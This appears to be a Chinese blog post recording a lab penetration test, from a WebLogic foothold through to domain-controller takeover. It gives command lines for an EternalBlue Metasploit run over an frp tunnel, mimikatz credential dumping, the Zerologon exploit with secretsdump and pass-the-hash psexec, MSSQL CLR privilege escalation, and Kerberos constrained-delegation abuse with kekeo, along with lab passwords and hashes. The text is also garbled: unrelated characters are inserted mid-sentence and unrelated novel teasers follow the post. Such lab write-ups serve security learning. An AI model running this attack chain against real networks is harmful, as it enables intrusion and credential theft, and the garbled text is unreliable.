一次內(nèi)網(wǎng)靶場學(xué)習(xí)記錄

image.png

環(huán)境搭建

web服務(wù)器:

外網(wǎng)IP 192.160.0.100

內(nèi)網(wǎng)IP 10.10.20.12

域內(nèi)機(jī)器win7 :

內(nèi)網(wǎng)IP 10.10.20.7

內(nèi)網(wǎng)IP 10.10.10.7

域內(nèi)服務(wù)器 Mssql:

內(nèi)網(wǎng)IP 10.10.10.18

域控機(jī)器:

內(nèi)網(wǎng)IP 10.10.10.8

→點擊查看技術(shù)資料←

1.2000多本網(wǎng)絡(luò)安全系列電子書
2.網(wǎng)絡(luò)安全標(biāo)準(zhǔn)題庫資料
3.項目源碼
4.網(wǎng)絡(luò)安全基礎(chǔ)入門、Linux检盼、web安全爬早、攻防方面的視頻
5.網(wǎng)絡(luò)安全學(xué)習(xí)路線圖

外網(wǎng)滲透

端口掃描
搭建好環(huán)境想诅,對目標(biāo)192.168.0.100進(jìn)行端口掃描探測

在這里插入圖片描述

目錄掃描
發(fā)現(xiàn)目標(biāo)開放了7001端口个唧,進(jìn)行目錄掃描探測钥顽,發(fā)現(xiàn)weblogic登錄口

在這里插入圖片描述

weblogic漏洞利用
在這里插入圖片描述

嘗試weblogic弱口令登錄不成功
在這里插入圖片描述

通過weblogic漏洞利用工具坟冲,發(fā)現(xiàn)目標(biāo)存在CVE-2020-2551漏洞可以利用

在這里插入圖片描述

出網(wǎng)探測
ping www.baidu.com發(fā)現(xiàn)目標(biāo)機(jī)器出網(wǎng)

在這里插入圖片描述

殺軟識別
tasklist /svc 通過進(jìn)程對比發(fā)現(xiàn)主機(jī)上沒有安裝殺軟
在這里插入圖片描述

直接powershell上線cs


在這里插入圖片描述

內(nèi)網(wǎng)滲透

信息搜集
通過執(zhí)行命令whoami /all發(fā)現(xiàn)存在雙網(wǎng)卡

密碼憑據(jù)抓取
通過hashdump抓取密碼Administrator ccef208c6485269c20db2cad21734fe7

在這里插入圖片描述

ntlm hash值為ccef208c6485269c20db2cad21734fe7睛挚,通過cmd5解出明文密碼Admin12345
在這里插入圖片描述

橫向移動
有了明文密碼我們可以進(jìn)行遠(yuǎn)程登陸邪蛔,但真實環(huán)境中不到萬不得已一般不建議執(zhí)行此操作,因此尋找其他的方法進(jìn)行內(nèi)網(wǎng)橫向移動

通過上傳fscan掃描10網(wǎng)段扎狱,發(fā)現(xiàn)存在ms17-010漏洞的10.10.20.7主機(jī)


在這里插入圖片描述

一開始打算通過Eternalblue直接上線cs侧到,發(fā)現(xiàn)不成功勃教,改用其他方法

項目地址:https://github.com/0xFenrik/Eternalblue

在這里插入圖片描述

隧道搭建
上傳frp搭建隧道代理

[common]#frpc配置
server_addr = VPS地址
server_port = 7000
[plugin_socks]
type = tcp
remote_port = 1080
plugin = socks5

[common]#frps配置
bind_addr =0.0.0.0
bind_port = 7000

永恒之藍(lán)ms17-010
改用metaspolit,調(diào)用永恒之藍(lán)模塊進(jìn)行攻擊匠抗,成功獲取shell

msf6 > setg Proxies socks5:frps服務(wù)端IP:監(jiān)聽端口
msf6 > setg ReverseAllowProxy true
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set payload windows/x64/meterpreter/bind_tcp
msf6 > set rhost 10.10.20.7
msf6 > run

或者vi /etc/proxychains.conf修改配置文件socks5 127.0.0.1 1080


在這里插入圖片描述

然后通過proxychains msfconsole啟動


在這里插入圖片描述

成功后通過mimikatz執(zhí)行creds_all獲取賬戶密碼redteam\saul:admin!@#45


在這里插入圖片描述

中轉(zhuǎn)上線
由于目標(biāo)機(jī)器win7不出網(wǎng)故源,因此以跳板機(jī)器作為中轉(zhuǎn),新建一個監(jiān)聽器

在這里插入圖片描述

通過psexec進(jìn)行上線

在這里插入圖片描述

成功上線后進(jìn)行內(nèi)網(wǎng)掃描汞贸,探測存活主機(jī)绳军,發(fā)現(xiàn)還存在10.10.10.8和10.10.10.18兩臺機(jī)器
在這里插入圖片描述

通過信息搜集發(fā)現(xiàn)當(dāng)前機(jī)器是在域環(huán)境內(nèi)net user /domain
在這里插入圖片描述

定位域控
接著定位到域控 net group "domain controllers" /domain
在這里插入圖片描述

ps:一般來說DNS服務(wù)器就是域控
在這里插入圖片描述

CVE-2020-1472

影響版本:

Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

通過CVE-2020-1472腳本進(jìn)行檢測

項目地址:https://github.com/SecuraBV/CVE-2020-1472

在這里插入圖片描述

1、重置管理員密鑰矢腻,進(jìn)行置空

python3 cve-2020-1472-exploit.py OWA 10.10.10.8


在這里插入圖片描述

2门驾、通過 Dcsync 查看密碼hash

python secretsdump.py redteam.red/OWA$@10.10.10.8 -just-dc -no-pass

在這里插入圖片描述

3、通過psexec和hash獲取域控權(quán)限

python psexec.py administrator@10.10.10.8 -hashes aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7

在這里插入圖片描述

4多柑、使用secretsdump解析保存在本地的nt hash

reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
reg save HKLM\SECURITY security.save

python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL


在這里插入圖片描述

5猎唁、通過reinstall腳本將$MACHINE.ACC:plain_password_hex中的原來nt hash恢復(fù)

python reinstall_original_pw.py OWA 10.10.10.8 8623dc75ede3ca9ec11f2475b12ef96d

在這里插入圖片描述

在這里插入圖片描述

約束委派接管域控
1、通過adfind尋找約束委派的用戶顷蟆,發(fā)現(xiàn)為sqlserver的機(jī)器

AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto

在這里插入圖片描述

2、通過端口探測發(fā)現(xiàn)sqlserver為10.10.10.18機(jī)器


在這里插入圖片描述

3腐魂、使用fscan進(jìn)行掃描fscan.exe -h 10.10.10.0/24 sqlserver為弱口令sa/sa


在這里插入圖片描述

在這里插入圖片描述

4帐偎、使用工具查看當(dāng)前權(quán)限SharpSQLTools.exe 10.10.10.18 sa sa master xp_cmdshell whoami

項目地址:https://github.com/uknowsec/SharpSQLTools/releases/tag/41

在這里插入圖片描述

5、權(quán)限較低蛔屹,使用以下命令進(jìn)行提權(quán):

SharpSQLTools.exe 10.10.10.18 sa sa master install_clr whoami
SharpSQLTools.exe 10.10.10.18 sa sa master enable_clr
SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato whoami


在這里插入圖片描述

在這里插入圖片描述

6削樊、上線CS并抓到sqlserver的密碼redteam\sqlserver Server12345


在這里插入圖片描述

在這里插入圖片描述

根據(jù)先前的信息搜集可知 sqlserver 是一個約束委派用戶,可以通過約束委派攻擊來接管域控

項目地址:https://github.com/gentilkiwi/kekeo/releases

1兔毒、利用 kekeo 請求該用戶的 TGT

kekeo.exe "tgt::ask /user:sqlserver /domain:redteam.red /password:Server12345 /ticket:administrator.kirbi"


在這里插入圖片描述

2漫贞、然后使用這張 TGT 獲取域機(jī)器的 ST

kekeo.exe "tgs::s4u /tgt: TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi /user:Administrator@redteam.red /service:cifs/owa.redteam.red"

在這里插入圖片描述

3、使用 mimikatz 將 ST 導(dǎo)入當(dāng)前會話育叁,運行 mimikatz 進(jìn)行 ptt

mimikatz kerberos::ptt TGS_Administrator@redteam.red@REDTEAM.RED_cifs~owa.redteam.red@REDTEAM.RED.kirbi

在這里插入圖片描述

4迅脐、成功獲取域控權(quán)限
在這里插入圖片描述

最后

點擊查看【網(wǎng)絡(luò)安全學(xué)習(xí)資料·攻略

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市豪嗽,隨后出現(xiàn)的幾起案子谴蔑,更是在濱河造成了極大的恐慌,老刑警劉巖龟梦,帶你破解...
    沈念sama閱讀 211,743評論 6 492
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件隐锭,死亡現(xiàn)場離奇詭異,居然都是意外死亡计贰,警方通過查閱死者的電腦和手機(jī)钦睡,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,296評論 3 385
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來躁倒,“玉大人荞怒,你說我怎么就攤上這事洒琢。” “怎么了挣输?”我有些...
    開封第一講書人閱讀 157,285評論 0 348
  • 文/不壞的土叔 我叫張陵纬凤,是天一觀的道長。 經(jīng)常有香客問我撩嚼,道長停士,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 56,485評論 1 283
  • 正文 為了忘掉前任完丽,我火速辦了婚禮恋技,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘逻族。我一直安慰自己蜻底,他們只是感情好,可當(dāng)我...
    茶點故事閱讀 65,581評論 6 386
  • 文/花漫 我一把揭開白布聘鳞。 她就那樣靜靜地躺著薄辅,像睡著了一般。 火紅的嫁衣襯著肌膚如雪抠璃。 梳的紋絲不亂的頭發(fā)上站楚,一...
    開封第一講書人閱讀 49,821評論 1 290
  • 那天,我揣著相機(jī)與錄音搏嗡,去河邊找鬼窿春。 笑死,一個胖子當(dāng)著我的面吹牛采盒,可吹牛的內(nèi)容都是我干的旧乞。 我是一名探鬼主播,決...
    沈念sama閱讀 38,960評論 3 408
  • 文/蒼蘭香墨 我猛地睜開眼磅氨,長吁一口氣:“原來是場噩夢啊……” “哼尺栖!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起烦租,我...
    開封第一講書人閱讀 37,719評論 0 266
  • 序言:老撾萬榮一對情侶失蹤决瞳,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后左权,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體皮胡,經(jīng)...
    沈念sama閱讀 44,186評論 1 303
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 36,516評論 2 327
  • 正文 我和宋清朗相戀三年赏迟,在試婚紗的時候發(fā)現(xiàn)自己被綠了屡贺。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 38,650評論 1 340
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖甩栈,靈堂內(nèi)的尸體忽然破棺而出房轿,到底是詐尸還是另有隱情落恼,我是刑警寧澤荒适,帶...
    沈念sama閱讀 34,329評論 4 330
  • 正文 年R本政府宣布持际,位于F島的核電站,受9級特大地震影響殴蹄,放射性物質(zhì)發(fā)生泄漏究抓。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 39,936評論 3 313
  • 文/蒙蒙 一袭灯、第九天 我趴在偏房一處隱蔽的房頂上張望刺下。 院中可真熱鬧,春花似錦稽荧、人聲如沸橘茉。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,757評論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽畅卓。三九已至,卻和暖如春蟋恬,著一層夾襖步出監(jiān)牢的瞬間翁潘,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 31,991評論 1 266
  • 我被黑心中介騙來泰國打工筋现, 沒想到剛下飛機(jī)就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人箱歧。 一個月前我還...
    沈念sama閱讀 46,370評論 2 360
  • 正文 我出身青樓矾飞,卻偏偏與公主長得像,于是被迫代替她去往敵國和親呀邢。 傳聞我的和親對象是個殘疾皇子洒沦,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 43,527評論 2 349

推薦閱讀更多精彩內(nèi)容